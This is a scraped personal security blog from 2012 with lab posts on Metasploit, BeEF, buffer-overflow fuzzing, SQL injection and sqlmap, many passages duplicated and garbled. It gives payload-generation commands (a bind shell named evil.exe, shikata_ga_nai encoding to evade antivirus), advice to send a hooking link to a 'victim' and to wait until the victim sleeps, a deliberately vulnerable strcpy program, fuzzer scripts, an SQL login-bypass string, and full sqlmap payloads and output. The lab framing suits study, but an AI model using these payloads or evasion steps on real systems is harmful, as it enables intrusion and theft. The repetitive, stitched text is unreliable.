then try send link to victim, thats link is go to webpage that contains beef inside of that pages. then run beef
Wednesday, 29 February 2012
Work With BeEF and Metasploits
this article is about exploits using BeEF( browser exploit framework) and metasploits, in here i use xp sp3 (virtual box) as victim,first i make payload using metasploits
then try send link to victim, thats link is go to webpage that contains beef inside of that pages. then run beef
then try send link to victim, thats link is go to webpage that contains beef inside of that pages. then run beef
Monday, 27 February 2012
work with metasploits and beef
this article is about exploitation using metasploits and beef, first exploits victim (xp-sp3) using metasploits
that i use payload vncinject/reverse_tcp,,, that is bad and risk,, so yo must wait the people have victim sleep,,,,
then i explore this system, i run mozzila firefox then i set a homepage this browser
i set this home page with address where i put file with beef inside that,, because i not have may time because my vbox is error i use file example from beef,,,
than run beef,,, and wait victim open mozilla firefox
then check on beef panel
than run beef,,, and wait victim open mozilla firefox
timeout,,
i'll continued next time,,
Metasploits Auxiliary Modules
metasploits have any auxiliary modules, which one of them is ftp_versions, that is use to show the version of ftp that running on target,, for use it like below :
first, run msfconcole
then run commands show auxiliary, it use to show all auxiliary modules
then run modules ftp_versions using command use scanner/ftp/ftp_versions,
then run command show options, is show any option on module ftp_versions
that showing if ftp version required target address to identifier, and port of ftp on target, and thread, that have default setting port on 21 and threads 1
then set ip host of target, in here i use 192.168.56.101, that is ip host of xp in vbox in my computer.
then run
that result show version of ftp that run on target (192.168.56.101).
first, run msfconcole
then run commands show auxiliary, it use to show all auxiliary modules
then run modules ftp_versions using command use scanner/ftp/ftp_versions,
that showing if ftp version required target address to identifier, and port of ftp on target, and thread, that have default setting port on 21 and threads 1
then set ip host of target, in here i use 192.168.56.101, that is ip host of xp in vbox in my computer.
that result show version of ftp that run on target (192.168.56.101).
Social Engineering and Social Engineering Toolkit (SET)
Social Engineering is the practice of learning and obtaining valuable information by exploiting human vulnerabilities, that is deceptions where a attacker to get information by request the information directly to the victim or other people have that informations. social engineering happends because we are social creatures and our nature makes us vulnerable to social engineering attacks. and that become weakest link in security defense on computer network system.
Social Engineering Toolkit is a packet that design to help doing social engineering, that help to prepare the most effective way of exploiting the client - side application vulnerabilities and make a fascinating attempt to capture the target's confidential information (for example, e-mail passwords). Some of the most efficient and useful attack methods employed by SET include, targeted phishing e-mails with a malicious file attachment, Java applet attacks, browser-based exploitation, gathering website credentials, creating infectious portable media , mass-mailer attacks, and other similar multi-attack web vectors. Thiscombination of attack methods provides a powerful platform to utilize and select the most persuasive technique that could perform an advanced attack against the human element.
MSFpayload and MFSencode
MSFpayload
The msfpayload is a component of Metasploit Framework, thats can use to generate shellcode, executables, and much more for use in exploits outside of the Framework. Shellcode can be generated in many formats including C, Ruby, JavaScript, and even Visual Basic for Applications.
example of the use msfpayload as below :
root@bt:/#msfpayload windows/shell_bind_tcp LPORT=4444 X > /sharefolder/evil.exe
this command is for make payload with type shell bind, this working when target run evil.exe file, attacker can run nc to open connection with the target.
metasploits have many type of payloads.
MSFencode
MSFencode is a component of matasploits framework, MSFencode is use to bypass bad charackter when we generate a payloads, also to bypass antivirus and IDS(intrustion detection system). because when we generate payload using msfpayloads, that result can include bad charackter, and that bad charackter can break your payloads. metasploits have any encoder
as shikata_ga_nai,etc.
as shikata_ga_nai,etc.
for implementation of MSFencode as below :
that is make payload with type shell reverse and generate this payloads using shikata_ga_nai encoder.
Friday, 24 February 2012
Buffer Overflow Exploits - Linux
this article is about step by step buffer overflow exploits in linux,,
firts turn of linux ASLR (Address Space Layout Randomization)
then make vulnerable applications
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]); // Vulnerable function
return 0;
}
firts turn of linux ASLR (Address Space Layout Randomization)
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]); // Vulnerable function
return 0;
}
Wednesday, 22 February 2012
Buffer Overflow Exploits - File Sharing Wizard
first i use wireshark to sniff trafic data on File Transfer Wizard from backtrack to vbox
Friday, 17 February 2012
Exploits Big Ant Server
this article is about, what all i do to expoits big ant server, big ant server offers secure instant messaging, file transfer, voip, video chat, web conferencing and more. and before you must know what is SEH and SafeSeh.because in this exploits associated with it SEH is a mechanism that owned a software and hardware in exception handling. exception will appear when an application try to execute code in the outside of normal code path and SafeSeh is a linker option that ussulay by proggramer when compile an aplication, its use to keep register address of seh in the module.
Tuesday, 14 February 2012
Buffer Overflow Exploits - VUPlayer
this article is,, what all i do when try to exploits VUPlayer,, first install VUPlayer in virtual box, after finished install, i open VUPlayer to know about VUPlayer
Sunday, 12 February 2012
Buffer Overflow Local Exploits
this article is about buffer overflow exploits, in this post i try to exploits rm-mp3 corventer. first i make a fuzzer with name mawarmerah.pls, its contain long url. script to make fuzzer as below:
#'/usr/bin/python
filename="malamterakhir.pls"
hancur='http://'
hancur+='\x41' * 35000;
file=open(filename,'w')
file.write(hancur)
print("hancurkan rek")
file.close()
Sunday, 5 February 2012
installation warFTP
to install warftp you must have master program of warftp you can download in here
1. extract file warftp
2. klick setup.exe
3. choose your location to install
1. extract file warftp
2. klick setup.exe
3. choose your location to install
Fuzzing and Fuzzer
fuzzer is a tool used by security professionals (and
professional hackers :) to test a parameter of an application. Typical
fuzzers test an application for buffer overflows, format string
vulnerabilities, and error handling. More advanced fuzzers incorporate
functionality to test for directory traversal attacks, command
execution vulnerabilities, SQL Injection and Cross Site Screpting vulnerabilities. Web Vulnerability scanners typically perform all of
this functionality, and can be considered an advanced fuzzer.
Buffer Overflow WarFTP Apllication
first make fuzzer aplication based on pyton using command :
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.43.2',21))
data=s.recv(1024)
print("sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
s.close()
print("Finish")
then run OllyDbg Aplication and open war-ftp.exe
#!/usr/bin/pyton
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
buffer="\x41"*1000
s.connect(('192.168.43.2',21))
data=s.recv(1024)
print("sendingevildatavia USER command...")
s.send('USER '+buffer+'\r\n')
s.close()
print("Finish")
then run OllyDbg Aplication and open war-ftp.exe
olly debugger
before i'am explain about olly debugger you mus know about debugger, debuger is a special program used to find errors (bugs) in other programs and ollydbg is one of tools of debugger.
OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces register, recognizes procedure , API calls, switches, tables, constant and strings, as well as locates routines from object files and libraries
OllyDbg is often used for reverse engginering of programs.It is often used by crackers to carck software made by other developers. For cracking and reverse engineering, it is often the primary tool because of its ease of use and availability. It is also useful for programmers to ensure that their program is running as intended.
Register Structured
registers is a part of processor memory which can be accessed at high speeds acces and always used by microprosessor as an intermediary in do their work.
register is divided into
register is divided into
- General Purpose Register
- Pointer dan Index Register
- Segmen Register
- Flag Register
1. General Purpose Register
it is 16 bit register consist of AX, BX, CX and DX
2. Pointer and Index Register
a register which is used as a pointer (pointer) to a location in memory. in 16 bit consist of SP( Stack Pointer), BP (Base Pointer), SI (source index) and DI (destination index), and IP (instruction pointer)
3. Segment Register
is a 16-bit registers to record address as a bookmark data location in memory. consist of SS ( Stack Segment), CS ( code segment), DS (data segment), and ES (extra segment).
4. Flag Register
is a 1-bit register that indicates the condition of a state (yes / no or 0/1)
Wednesday, 1 February 2012
nc using mkfifo
Netcat is an incredibly usefull tool, that allows you to play with tcp connection easily from the shell.
Basically, as it name implies, it’s just cat over the network, but what its name doesn’t tell you is that it also can act as a socket listener.
So let’s play with pipes, here is one of my favourite use of netcat:
This command will redirect traffic from localhost:80 to localhost:81, in the inflow file you while find the incoming http request, in the outfile, you will find the http response from the server.
Similarly, you can do this:
Basically, as it name implies, it’s just cat over the network, but what its name doesn’t tell you is that it also can act as a socket listener.
So let’s play with pipes, here is one of my favourite use of netcat:
#mkfifo proxypipe | # | cat proxypipe | nc -l -p 80 | tee -a inflow | nc localhost 81 | tee -a outflow 1>proxypipe |
This command will redirect traffic from localhost:80 to localhost:81, in the inflow file you while find the incoming http request, in the outfile, you will find the http response from the server.
Similarly, you can do this:
cat proxypipe | nc -l 80 | tee -a inflow | sed 's/^Host.*/Host: www.target.fr/' | nc www.gtarget.fr 80 | tee -a outflow >proxypipe bypassing username password in login form
first to practice,, open localhost/fbip on your browser
then type ' or '1'='1'# in form so admin page will be opened :
then type ' or '1'='1'# in form so admin page will be opened :
SQL injection in localhost/dvwa
first run localhost/dvwa on your browser :
then press menu sql injection, then in form input id input with 1, so dvwa will show as below :
then open sql map and type this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" --string="Surname" --dbs
below is a part of result from that command :
then type command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:52:34
[11:52:34] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:52:34] [INFO] resuming injection data from session file
[11:52:34] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:52:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1935=1935 AND 'vLTC'='vLTC&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 3719 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,98,102,100,58),IFNULL(CAST(CHAR(65,118,104,113,75,114,112,72,106,97) AS CHAR),CHAR(32)),CHAR(58,110,101,105,58)), NULL# AND 'Cbmh'='Cbmh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'BJNX'='BJNX&Submit=Submit
---
[11:52:34] [INFO] manual usage of GET payloads requires url encoding
[11:52:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:52:34] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[11:52:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:52:35
then type this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" -T users -C user_id --dump
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:56:20
[11:56:20] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:56:20] [INFO] resuming injection data from session file
[11:56:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:56:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1935=1935 AND 'vLTC'='vLTC&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 3719 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,98,102,100,58),IFNULL(CAST(CHAR(65,118,104,113,75,114,112,72,106,97) AS CHAR),CHAR(32)),CHAR(58,110,101,105,58)), NULL# AND 'Cbmh'='Cbmh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'BJNX'='BJNX&Submit=Submit
---
[11:56:20] [INFO] manual usage of GET payloads requires url encoding
[11:56:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:56:20] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[11:56:20] [INFO] fetching current database
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[11:56:23] [INFO] fetching columns LIKE 'user_id' for table 'users' on database 'dvwa'
[11:56:23] [INFO] fetching column(s) 'user_id' entries for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[5 entries]
+---------+
| user_id |
+---------+
| 1 |
| 3 |
| 2 |
| 5 |
| 4 |
+---------+
[11:56:23] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[11:56:23] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:56:23
then press menu sql injection, then in form input id input with 1, so dvwa will show as below :
then open sql map and type this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" --string="Surname" --dbs
below is a part of result from that command :
then type command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" -D dvwa --tables
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:52:34
[11:52:34] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:52:34] [INFO] resuming injection data from session file
[11:52:34] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:52:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1935=1935 AND 'vLTC'='vLTC&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 3719 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,98,102,100,58),IFNULL(CAST(CHAR(65,118,104,113,75,114,112,72,106,97) AS CHAR),CHAR(32)),CHAR(58,110,101,105,58)), NULL# AND 'Cbmh'='Cbmh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'BJNX'='BJNX&Submit=Submit
---
[11:52:34] [INFO] manual usage of GET payloads requires url encoding
[11:52:34] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:52:34] [INFO] fetching tables for database: dvwa
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+
[11:52:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:52:35
then type this command :
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=snncv5o9prk5au40rf5m30fjn2" -T users -C user_id --dump
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 11:56:20
[11:56:20] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[11:56:20] [INFO] resuming injection data from session file
[11:56:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[11:56:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1935=1935 AND 'vLTC'='vLTC&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 3719 FROM(SELECT COUNT(*),CONCAT(CHAR(58,98,102,100,58),(SELECT (CASE WHEN (3719=3719) THEN 1 ELSE 0 END)),CHAR(58,110,101,105,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Smid'='Smid&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=1' UNION ALL SELECT CONCAT(CHAR(58,98,102,100,58),IFNULL(CAST(CHAR(65,118,104,113,75,114,112,72,106,97) AS CHAR),CHAR(32)),CHAR(58,110,101,105,58)), NULL# AND 'Cbmh'='Cbmh&Submit=Submit
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'BJNX'='BJNX&Submit=Submit
---
[11:56:20] [INFO] manual usage of GET payloads requires url encoding
[11:56:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:56:20] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
[11:56:20] [INFO] fetching current database
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[11:56:23] [INFO] fetching columns LIKE 'user_id' for table 'users' on database 'dvwa'
[11:56:23] [INFO] fetching column(s) 'user_id' entries for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[5 entries]
+---------+
| user_id |
+---------+
| 1 |
| 3 |
| 2 |
| 5 |
| 4 |
+---------+
[11:56:23] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[11:56:23] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 11:56:23
What is TOR
Tor is a network of virtual tunnels that allows people and groups to
improve their privacy and security on the Internet. It also enables
software developers to create new communication tools
with built-in privacy features. Tor provides the foundation for
a range of applications that allow organizations and individuals
to share information over public networks without compromising their
privacy.
Individuals use Tor to keep websites from tracking them and their family
members, or to connect to news sites, instant messaging services, or the
like when these are blocked by their local Internet providers. Tor's hidden service let users publish web sites and other services without needing to reveal
the location of the site. Individuals also use Tor for socially sensitive
communication: chat rooms and web forums for rape and abuse survivors,
or people with illnesses.
Journalists use Tor to communicate more safely with whistleblowers and
dissidents. Non-governmental organizations (NGOs) use Tor to allow their
workers to connect to their home website while they're in a foreign
country, without notifying everybody nearby that they're working with
that organization.
Groups such as Indymedia recommend Tor for safeguarding their members'
online privacy and security. Activist groups like the Electronic Frontier
Foundation (EFF) recommend Tor as a mechanism for
maintaining civil liberties online. Corporations use Tor as a safe way
to conduct competitive analysis, and to protect sensitive procurement
patterns from eavesdroppers. They also use it to replace traditional
VPNs, which reveal the exact amount and timing of communication. Which
locations have employees working late? Which locations have employees
consulting job-hunting websites? Which research divisions are communicating
with the company's patent lawyers?
A branch of the U.S. Navy uses Tor for open source intelligence
gathering, and one of its teams used Tor while deployed in the Middle
East recently. Law enforcement uses Tor for visiting or surveilling
web sites without leaving government IP addresses in their web logs,
and for security during sting operations.
The variety of people who use Tor is actually part of what make it so secure. Tor hides you among the other user on the network,
so the more populous and diverse the user base for Tor is, the more your
anonymity will be protected.
Google Hacking
Google hacking is the use of a search engine, such as Google, to locate a security vulnerability
on the Internet. There are generally two types of vulnerabilities to be found on the Web: software
vulnerabilities and misconfigurations. Although there are some sophisticated intruders who target a
specific system and try to discover vulnerabilities that will allow them access, the vast majority
of intruders start out with a specific software vulnerability or common user misconfiguration that
they already know how to exploit, and simply try to find or scan for systems that have this
vulnerability.
Google is of limited use to the first attacker, but invaluable to the second.
When an attacker knows the sort of vulnerability he wants to exploit but has no specific target,
he employs a scanner. A scanner is a program that automates the process of examining a massive
quantity of systems for a security flaw. The earliest computer-related scanner, for example, was a
war dialer; a program that would dial long lists of phone numbers and record which ones
responded with a modem handshake.
About Shodan
SHODAN is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.
shodan is different with google or bing, shodan is not search content of website but shodan searching a spicific computers. if you're interested
in finding computers running a certain piece of software (such as Apache)? Or if you want to know
which version of Microsoft IIS is the most popular? Or you want to see how many anonymous FTP servers there are?
Maybe a new vulnerability came out and you want to see how many hosts it could infect?
Traditional web search engines don't let you answer those questions, but shodan will be answer your question.
below is first interface if you open shodanhq.com
and below is result of searching using shodan
Subscribe to:
Posts (Atom)